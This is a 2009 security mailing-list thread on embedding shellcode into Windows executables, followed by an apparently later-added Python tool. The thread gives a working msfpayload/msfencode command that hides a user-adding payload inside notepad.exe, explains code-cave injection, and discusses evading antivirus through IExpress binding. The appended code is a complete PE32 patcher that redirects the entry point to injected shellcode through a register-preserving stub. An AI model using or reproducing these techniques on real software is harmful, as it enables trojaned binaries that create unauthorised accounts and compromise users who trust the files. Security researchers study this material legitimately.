[Pauldotcom] Manually embedding shellcode into executables
irongeek at irongeek.com
Wed Dec 2 06:05:48 UTC 2009
Thanks. I was a little confused since on the show it seemed that Dave was
saying it acted like a binder.
I've used iexpress before:
Nice thing about it as a binder: since it's made by Microsoft, AV won't
I'd still love to use msfencode with an arbitrary exe however.
On Tue, Dec 1, 2009 at 9:05 PM, Rob Fuller <jd.mubix at gmail.com> wrote:
> Correct, the actual execution of the original binary is somewhat destroyed
> in trade though it's nearly undetectable at this point in time. So
> technically you could use this with my IExpress 'hack'
> http://www.room362.com/blog/2009/3/2/metasploit-hearts-microsoft.html -
> but you're going to have to manually change the Icon and the file size will
> The reason why your exe | to encode isn't working is because when you do
> msfpayload in raw format it is just the shellcode instruction set that is
> getting sent to msfencode, whereas your cat or echo is including all the PE
> headers and sections of a compiled binary, which "at this time" msfencode
> does not know how to handle. As you stated, this is in 'binder' territory.
> Now back to the original topic, shoving shellcode into binaries is a tricky
> process, well, if you want it to go unnoticed, because you have to do a
> couple things:
> 1. Find a 'code cave' (a location in the binary that is full of null bytes and
> (here is the tricky part) isn't used by the binary for extraction,
> compression or decompression at any time during execution.
> 2. Reroute execution to your shell code, safely and in a manner that doesn't
> hang the process until you close your shell.
> 3. Correct the registers so that after your shell code executes, the
> trojan'd binary doesn't fall over and die because it couldn't find the
> things it needed in memory.
> to do this all successfully and *arbitrarily* you need to get
> pretty intimate with the entire life of a process.
> Rob Fuller | Mubix
> Room362.com | Hak5.org | TheAcademyPro.com
> On Tue, Dec 1, 2009 at 5:17 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
>> Ok, I just read Rob's post here:
>> and checked my exes. Since both are the same size, I'm guessing it's not
>> working as a binder but as a "cloaker" of sorts.
>> On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:
>>> Ok, I did this:
>>> $ msfpayload windows/adduser user=test pass=test exitfunc=seh R |
>>> msfencode -t exe -x notepad.exe -o MYNEWFILE.exe
>>> The exe made has the same icon and metadata as the original. The payload
>>> runs since the "test" account is created, but notepad never comes up, so it
>>> does not make much of a binder. Any ideas?
>> Pauldotcom mailing list
>> Pauldotcom at mail.pauldotcom.com
>> Main Web Site: http://pauldotcom.com
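As an added illustration of the three steps Rob lists (find a code cave, reroute the entry point, save and restore the registers so the host still runs), here is a small PE32 patcher. This is example code written for this page, not Rob's tooling and not what msfencode -x does internally. Everything it reads is at documented PE/COFF header offsets; the minimal one-section PE it builds and the four-byte NOP stand-in for shellcode are constructed for offline testing, and the wrapper it writes (pushad/pushfd, shellcode, popfd/popad, jmp to the original entry) is the usual register-preserving stub, which assumes the shellcode returns with the stack balanced. It also refuses input with no MZ/PE headers, the same distinction Rob draws between `msfpayload ... R` output and a catted exe.

```python
"""Hand-patching x86 shellcode into a PE32 executable through a code cave: find a null
run in an executable section, point AddressOfEntryPoint at a register-preserving stub
there, jump back to the original entry. Sample PE and NOP "shellcode" are constructed."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
PE32_MAGIC = 0x10B
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def parse_pe(data):
    """Return (entry RVA, file offset of AddressOfEntryPoint, section table)."""
    if data[:2] != b"MZ":  # raw shellcode, as `msfpayload ... R` emits, has no headers
        raise ValueError("no MZ header: input is not a PE file")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24  # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 (32-bit) images are handled here")
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0"), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "rawptr": f[4], "chars": f[9]})
    return entry_rva, opt + 16, sections

def is_pe(data):  # compiled binary with PE headers (True) or a raw shellcode blob (False)?
    try:
        parse_pe(data)
        return True
    except ValueError:
        return False

def find_code_cave(data, sections, size):
    """First run of >= size null bytes in the mapped part of an executable section.
    A static scan cannot tell whether the binary writes there at run time (packers
    decompress into such padding); that check is up to the operator."""
    for s in sections:
        if not s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            continue
        span = min(s["rawsize"], s["vsize"])  # bytes the loader is sure to map
        run = 0
        for i in range(span):
            run = run + 1 if data[s["rawptr"] + i] == 0 else 0
            if run == size:
                start = i - size + 1
                return s["rawptr"] + start, s["va"] + start
    return None

def build_stub(shellcode, stub_rva, orig_entry_rva):
    """x86: pushad; pushfd; <shellcode>; popfd; popad; jmp orig_entry."""
    head, tail = b"\x60\x9c", b"\x9d\x61"
    jmp_rva = stub_rva + len(head) + len(shellcode) + len(tail)
    rel32 = (orig_entry_rva - (jmp_rva + 5)) & 0xFFFFFFFF  # relative to end of 5-byte E9
    return head + shellcode + tail + b"\xe9" + struct.pack("<I", rel32)

def inject(data, shellcode):
    """Return (patched image, info). The shellcode must return with the stack balanced."""
    entry_rva, entry_off, sections = parse_pe(data)
    stub_len = 2 + len(shellcode) + 2 + 5
    cave = find_code_cave(data, sections, stub_len)
    if cave is None:
        raise ValueError("no code cave of %d bytes in any executable section" % stub_len)
    cave_off, cave_rva = cave
    stub = build_stub(shellcode, cave_rva, entry_rva)
    out = bytearray(data)
    out[cave_off:cave_off + len(stub)] = stub           # step 1: fill the cave
    struct.pack_into("<I", out, entry_off, cave_rva)    # step 2: reroute execution
    return bytes(out), {"orig_entry": entry_rva, "new_entry": cave_rva,
                        "cave_off": cave_off, "stub": stub}

def build_sample_pe(code, pad=0x100):
    """Constructed minimal PE32: one .text section holding `code` then `pad` null bytes."""
    dos = bytearray(b"MZ".ljust(64, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)  # i386, one section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    for off, val in ((16, 0x1000), (20, 0x1000), (28, 0x400000), (32, 0x1000),
                     (36, 0x200), (56, 0x2000), (60, 0x200), (92, 16)):
        struct.pack_into("<I", opt, off, val)  # entry, code base, image base, alignments, sizes
    vsize = len(code) + pad
    rawsize = (vsize + 0x1FF) & ~0x1FF
    sec = struct.pack(SECTION_FMT, b".text", vsize, 0x1000, rawsize, 0x200, 0, 0, 0, 0,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    headers = (dos + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0")
    return bytes(headers) + (code + b"\0" * pad).ljust(rawsize, b"\0")

if __name__ == "__main__":
    host = build_sample_pe(b"\x31\xc0\xc3")    # xor eax,eax; ret: stand-in host program
    patched, info = inject(host, b"\x90" * 4)  # placeholder for real, returning shellcode
    print("entry 0x%x -> 0x%x, stub at file offset 0x%x: %s" % (
        info["orig_entry"], info["new_entry"], info["cave_off"], info["stub"].hex()))
```

Running it prints the old and new entry RVAs and the stub bytes. The patched file keeps its original size, which is the same thing Adrian noticed about his msfencode -x output. Two of Rob's points stay outside what this code can check: step 1's caveat that the null run must not be written to at run time (a packed binary will unpack straight over it), and step 2's "don't hang the process", which depends on the shellcode itself returning or spawning its own thread rather than blocking in the stub.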